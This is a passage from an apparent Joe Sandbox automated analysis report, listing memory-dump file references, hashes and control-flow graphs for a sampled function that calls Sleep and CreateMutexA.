                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263754240.0000000000D64000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264152445.0000000000D77000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264185231.0000000000D7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264250857.0000000000D7B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264297700.0000000000D80000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264363361.0000000000D81000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264454747.0000000000D84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264485622.0000000000D94000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264514027.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264579436.0000000000D9F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264617171.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264666917.0000000000DA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264698485.0000000000DA5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264722936.0000000000DA6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264767282.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264800781.0000000000DAC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264830770.0000000000DAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264893177.0000000000DB4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264925357.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264973602.0000000000DBD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265002785.0000000000DBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265074796.0000000000DD1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265152560.0000000000DD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265152560.0000000000DF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265238833.0000000000E2A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265272134.0000000000E2B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265294072.0000000000E2C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265322265.0000000000E30000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265346138.0000000000E32000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265370247.0000000000E41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265391318.0000000000E43000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_b20000_file.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1464230837-0
                                                                                                                                                                                                                                                  • Opcode ID: c03ba979856acf624a3779483818f969205d8357a4f74848569027df77cc7959
                                                                                                                                                                                                                                                  • Instruction ID: ad7b2e3aa8f9b94172cf220166d97d99ad45f36f4af845716b9bed22c8e01dd2
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c03ba979856acf624a3779483818f969205d8357a4f74848569027df77cc7959
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 57313B71A042149BEB08EB78FD8976DBBE2EBC5310F244299E01C9B3D6C7759980C751

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 241 b29f44-b29f64 245 b29f92-b29fae 241->245 246 b29f66-b29f72 241->246 249 b29fb0-b29fbc 245->249 250 b29fdc-b29ffb 245->250 247 b29f74-b29f82 246->247 248 b29f88-b29f8f call b3d663 246->248 247->248 253 b2a92b 247->253 248->245 255 b29fd2-b29fd9 call b3d663 249->255 256 b29fbe-b29fcc 249->256 251 b2a029-b2a916 call b380c0 250->251 252 b29ffd-b2a009 250->252 257 b2a00b-b2a019 252->257 258 b2a01f-b2a026 call b3d663 252->258 260 b2a953-b2a994 Sleep CreateMutexA 253->260 261 b2a92b call b56c6a 253->261 255->250 256->253 256->255 257->253 257->258 258->251 270 b2a996-b2a998 260->270 271 b2a9a7-b2a9a8 260->271 261->260 270->271 273 b2a99a-b2a9a5 270->273 273->271
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • Sleep.KERNEL32(00000064), ref: 00B2A963
                                                                                                                                                                                                                                                  • CreateMutexA.KERNEL32(00000000,00000000,00B83254), ref: 00B2A981
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2263048364.0000000000B21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263009079.0000000000B20000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263048364.0000000000B82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263197124.0000000000B89000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263230633.0000000000B8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263259717.0000000000B97000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263408061.0000000000CF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263431405.0000000000CFA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263469671.0000000000D14000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263469671.0000000000D22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263534135.0000000000D25000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263567117.0000000000D27000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263592585.0000000000D28000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263621554.0000000000D2B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263658433.0000000000D3D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263686082.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263720268.0000000000D53000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263754240.0000000000D64000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264152445.0000000000D77000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264185231.0000000000D7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264250857.0000000000D7B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264297700.0000000000D80000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264363361.0000000000D81000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264454747.0000000000D84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264485622.0000000000D94000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264514027.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264579436.0000000000D9F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264617171.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264666917.0000000000DA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264698485.0000000000DA5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264722936.0000000000DA6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264767282.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264800781.0000000000DAC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264830770.0000000000DAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264893177.0000000000DB4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264925357.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264973602.0000000000DBD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265002785.0000000000DBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265074796.0000000000DD1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265152560.0000000000DD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265152560.0000000000DF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265238833.0000000000E2A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265272134.0000000000E2B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265294072.0000000000E2C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265322265.0000000000E30000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265346138.0000000000E32000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265370247.0000000000E41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265391318.0000000000E43000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_b20000_file.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1464230837-0
                                                                                                                                                                                                                                                  • Opcode ID: 77453db5a0498430ce86cfc7d4381f48248301980e33d16d9d8880f725a97c9c
                                                                                                                                                                                                                                                  • Instruction ID: 1d545751e1037a529005ad078c6ba8854808ba4f363528439fbb54539dc703b4
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 77453db5a0498430ce86cfc7d4381f48248301980e33d16d9d8880f725a97c9c
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 00315931A001209BEB18EB78ED997ADB7E2EBC5310F204699E11CDB3D5D776A9808752

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 275 b2a079-b2a099 279 b2a0c7-b2a0e3 275->279 280 b2a09b-b2a0a7 275->280 281 b2a111-b2a130 279->281 282 b2a0e5-b2a0f1 279->282 283 b2a0a9-b2a0b7 280->283 284 b2a0bd-b2a0c4 call b3d663 280->284 287 b2a132-b2a13e 281->287 288 b2a15e-b2a916 call b380c0 281->288 285 b2a0f3-b2a101 282->285 286 b2a107-b2a10e call b3d663 282->286 283->284 289 b2a930-b2a994 call b56c6a Sleep CreateMutexA 283->289 284->279 285->286 285->289 286->281 293 b2a140-b2a14e 287->293 294 b2a154-b2a15b call b3d663 287->294 305 b2a996-b2a998 289->305 306 b2a9a7-b2a9a8 289->306 293->289 293->294 294->288 305->306 307 b2a99a-b2a9a5 305->307 307->306
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • Sleep.KERNEL32(00000064), ref: 00B2A963
                                                                                                                                                                                                                                                  • CreateMutexA.KERNEL32(00000000,00000000,00B83254), ref: 00B2A981
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2263048364.0000000000B21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263009079.0000000000B20000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263048364.0000000000B82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263197124.0000000000B89000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263230633.0000000000B8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263259717.0000000000B97000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263408061.0000000000CF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263431405.0000000000CFA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263469671.0000000000D14000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263469671.0000000000D22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263534135.0000000000D25000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263567117.0000000000D27000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263592585.0000000000D28000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263621554.0000000000D2B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263658433.0000000000D3D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263686082.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263720268.0000000000D53000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263754240.0000000000D64000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264152445.0000000000D77000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264185231.0000000000D7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264250857.0000000000D7B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264297700.0000000000D80000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264363361.0000000000D81000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264454747.0000000000D84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264485622.0000000000D94000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264514027.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264579436.0000000000D9F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264617171.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264666917.0000000000DA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264698485.0000000000DA5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264722936.0000000000DA6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264767282.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264800781.0000000000DAC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264830770.0000000000DAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264893177.0000000000DB4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264925357.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264973602.0000000000DBD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265002785.0000000000DBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265074796.0000000000DD1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265152560.0000000000DD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265152560.0000000000DF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265238833.0000000000E2A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265272134.0000000000E2B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265294072.0000000000E2C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265322265.0000000000E30000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265346138.0000000000E32000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265370247.0000000000E41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265391318.0000000000E43000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_b20000_file.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1464230837-0
                                                                                                                                                                                                                                                  • Opcode ID: ddda051058c6ac4edd247df9806fddb94976ae8e4afebb3c98154d6cdbba6706
                                                                                                                                                                                                                                                  • Instruction ID: bb264a8593cc9f4bb8dc0b5712a7d7969ccbdb679e04f5440a883cdb25aefdc9
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ddda051058c6ac4edd247df9806fddb94976ae8e4afebb3c98154d6cdbba6706
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0F314A31A102209BEB08DB78EDC975DF7E3EBC6314F204699E018AB3D5C77699808712

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 309 b2a1ae-b2a1ce 313 b2a1d0-b2a1dc 309->313 314 b2a1fc-b2a218 309->314 315 b2a1f2-b2a1f9 call b3d663 313->315 316 b2a1de-b2a1ec 313->316 317 b2a246-b2a265 314->317 318 b2a21a-b2a226 314->318 315->314 316->315 319 b2a935 316->319 323 b2a293-b2a916 call b380c0 317->323 324 b2a267-b2a273 317->324 321 b2a228-b2a236 318->321 322 b2a23c-b2a243 call b3d663 318->322 327 b2a953-b2a994 Sleep CreateMutexA 319->327 328 b2a935 call b56c6a 319->328 321->319 321->322 322->317 330 b2a275-b2a283 324->330 331 b2a289-b2a290 call b3d663 324->331 338 b2a996-b2a998 327->338 339 b2a9a7-b2a9a8 327->339 328->327 330->319 330->331 331->323 338->339 341 b2a99a-b2a9a5 338->341 341->339
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • Sleep.KERNEL32(00000064), ref: 00B2A963
                                                                                                                                                                                                                                                  • CreateMutexA.KERNEL32(00000000,00000000,00B83254), ref: 00B2A981
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2263048364.0000000000B21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263009079.0000000000B20000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263048364.0000000000B82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263197124.0000000000B89000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263230633.0000000000B8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263259717.0000000000B97000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263408061.0000000000CF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263431405.0000000000CFA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263469671.0000000000D14000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263469671.0000000000D22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263534135.0000000000D25000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263567117.0000000000D27000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263592585.0000000000D28000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263621554.0000000000D2B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263658433.0000000000D3D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263686082.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263720268.0000000000D53000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263754240.0000000000D64000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264152445.0000000000D77000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264185231.0000000000D7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264250857.0000000000D7B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264297700.0000000000D80000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264363361.0000000000D81000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264454747.0000000000D84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264485622.0000000000D94000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264514027.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264579436.0000000000D9F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264617171.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264666917.0000000000DA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264698485.0000000000DA5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264722936.0000000000DA6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264767282.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264800781.0000000000DAC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264830770.0000000000DAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264893177.0000000000DB4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264925357.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264973602.0000000000DBD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265002785.0000000000DBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265074796.0000000000DD1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265152560.0000000000DD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265152560.0000000000DF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265238833.0000000000E2A000.00000080.00000001.01000000.00000003.sdmpDownload File
